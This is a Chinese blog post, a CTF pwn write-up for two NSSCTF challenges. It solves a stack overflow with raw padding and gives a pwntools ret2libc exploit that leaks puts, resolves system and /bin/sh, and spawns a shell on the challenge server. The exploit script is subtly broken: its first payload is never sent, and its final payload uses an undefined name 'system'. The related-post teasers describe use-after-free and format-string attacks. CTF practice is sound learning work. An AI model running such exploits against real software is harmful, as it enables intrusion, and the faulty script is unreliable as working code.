NSSCTF(PWN)5

于 2024-09-30 20:38:06 发布
阅读量299 收藏 1
点赞数 9
文章标签: python 网络安全 ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142662978
版权

[GDOUCTF 2023]EASY PWN

使用checksec知道是64位文件

发现print_flag我们双击进入

发现flag藏在这里面,我们回头去看if(v5)的条件,知道我们V5不能为0,这里涉及了栈溢出

这个是我们要溢出的栈,直接b'a'*(0x1F+0x8)

还有一种方法直接nc然后输入大量字符

[SWPUCTF 2021 新生赛]whitegive_pwn

发现是64位文件

main函数里有vuln双击进入

发现只有一个gets,我们一看就知道这里是涉及了栈溢出

且这道题是没有system和binsh的,所有我们用到了ret2libc

首先要找到这道题目的rdi和ret

exp:

from pwn import *
from LibcSearcher import *
io = remote('node7.anna.nssctf.cn','27267')
elf = ELF('/home/xp/tm/bin/d')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = elf.sym['vuln']
ret = 0x400509
rdi = 0x400763
padding = b'a'*(0x10+0x8)
payload = padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)
put = u64(io.recvuntil(b'\x7f', timeout=5)[ -6:].ljust(8, b'\x00'))
print(hex(put))
libc = LibcSearcher('puts',put)
base = put - libc.dump('puts')
sys = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
payload1 = padding + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.sendline(payload1)
io.interactive()

樊少泽
关注
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 742
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1722
这不是欺负老实人嘛~
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3473
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF(PWN)
fanshaoze的博客
09-28 272
题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 456
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1
qq_45692883的博客
01-19 502
我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可。这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节。使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变。gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容。差不多就是这里: 0x4006be。知道了这些后,开始写exp。
NSSCTF(PWN)2
fanshaoze的博客
09-28 253
checksec看一下文件,发现是64位的查看main函数,有read涉及栈溢出,这里要打印一下name,整形数字要小于10,我们用到-1发现有system和binsh。
NSSCTF(PWN)4
最新发布
fanshaoze的博客
09-30 196
使用checksec发现这是64位文件查看main函数发现这题涉及到了栈溢出我们点开第一个read,name发现位于bss段中,就想到这里涉及到了shellcode,但是使用 shellcraft 默认生成的字节数是 44 字节,这里最大输入数才25字节,所有不能使用默认生成。
NSSCTF(PWN)3
fanshaoze的博客
09-29 320
这是一道简单的nc签到题,直接终端nc就行。
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1945
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[BUUCTF]Pwn刷题记录
x0r
10-13 236
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 123
PWN 要点
2023年SWPU NSS 秋季招新赛 (校外赛道) PWN 题解
2301_77205899的博客
10-24 296
food函数中输入数量 v1为int类型 可以为负数 只要输入一个较大的负数即可使money>10000。read函数 可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出。简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推。直接利用pwntools写shellcode即可。然后利用泄露puts地址 得到libc基地址。/x00 绕过strlen检测。再执行以下函数door()exp python3语法。
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4338
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 663
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
2301_78772942的博客
09-27 690
第二百五十四节 JPA教程 - JPA 多对多映射示例
python中的深浅拷贝以及总体框架了解
AgostoDu的博客
09-26 1142
1、当b使用copy.deepcopy()深拷贝的时候,可以理解为b不仅外面的整体开辟了一个新的内存地址,b里面包含的列表也开辟了新的内存地址和a里面的内存地址没有任何关系,所以当a修改里面列表元素的值时不会影响b里面列表元素的值。print(mr) #{'name': 'lis', 'age': 18, 'scroe': 100}<br>备注:已经存在的值的优先级>默认值<br>6.3 直接修改 值,显示最新修改值 (修改默认值优先级小于直接添加的字典值)<br>
Python精选200Tips:171-175
AnFany
09-26 1198
Python深度学习的项目
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目中,攻击者可以通过构造特定的输入来修改程序中的变量,进而获取shell权限。具体的payload可以参考引用和引用中的代码示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值